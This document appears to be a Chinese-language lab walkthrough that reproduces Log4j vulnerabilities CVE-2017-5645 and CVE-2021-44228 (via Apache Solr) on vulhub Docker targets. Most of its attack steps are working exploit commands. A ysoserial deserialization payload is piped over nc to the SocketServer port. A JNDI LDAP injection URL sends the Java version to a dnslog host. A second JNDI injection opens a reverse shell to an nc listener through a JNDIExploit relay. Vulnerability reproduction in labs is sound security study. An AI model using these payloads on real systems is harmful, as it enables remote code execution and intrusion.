log4j漏洞复现
靶场搭建
下载vulhub
1 | git clone --depth 1 https://github.com/vulhub/vulhub |
进入目录,启动容器
1 | cd vulhub/log4j/CVE-2017-5645/ |
关闭容器
1 | docker compose down |
Apache Log4j是一个广泛使用的Java日志记录库,它通过提供灵活的日志记录级别、日志格式和日志目的地等功能,成为了许多开发者和组织的首选日志工具。
cve-2017-5645
漏洞背景
Log4j 是 Apache 软件基金会开发的 Java 日志框架,广泛用于企业级应用。其 SocketServer 功能允许通过网络接收日志事件,但在早期版本中未对输入对象进行安全检查。攻击者可向日志监听端口发送精心构造的恶意对象,导致目标服务器反序列化并执行任意代码。
攻击机理
该漏洞利用了 Java 对象反序列化机制的固有风险。当 SocketServer 接收序列化对象流时,若数据来自不受信任来源且未启用安全策略,恶意对象会在反序列化过程中触发任意代码执行。此攻击无需身份验证,只要网络端口可达即可能被利用。
影响版本:Apache Log4j 2.0-beta9 ~ 2.8.1
复现
端口扫描
1 | nmap 192.168.4.134 -p 4712 |
Log4j SocketServer 默认端口:4712
验证:
工具:https://github.com/Y4er/ysoserial/releases
1 | java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc 192.168.4.134 4712 |
查看:
1 | #进入CVE-2017-564容器内部 |
反弹shell:
生成shell:https://forum.ywhack.com/shell.php
1 |
|
cve-2021-44228_solr_1漏洞复现
影响版本:Log4j 2.0-beta9 ~ 2.14.1
搭建靶场
查看映射端口
Solr(读作“solar”)是Apache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示[2]、分面搜索、动态聚类、数据库集成,以及富文本(如Word、PDF)的处理。Solr是高度可扩展的,并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎
solr后台:
Dnslog验证:
1 | http://192.168.4.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.lzeckl.dnslog.cn} |

反弹shell:
工具:https://github.com/0x727/JNDIExploit/releases/tag/1.1
中转站ip:192.168.4.128

攻击机ip:192.168.4.1监听6666端口:
1 | nc -lvp 6666 |
访问
1 | http://192.168.4.134:8983/solr/admin/cores?action=${jndi:ldap://192.168.4.128:1389/Basic/ReverseShell/192.168.4.1/6666} |

受害机ip:192.168.4.134
getshell

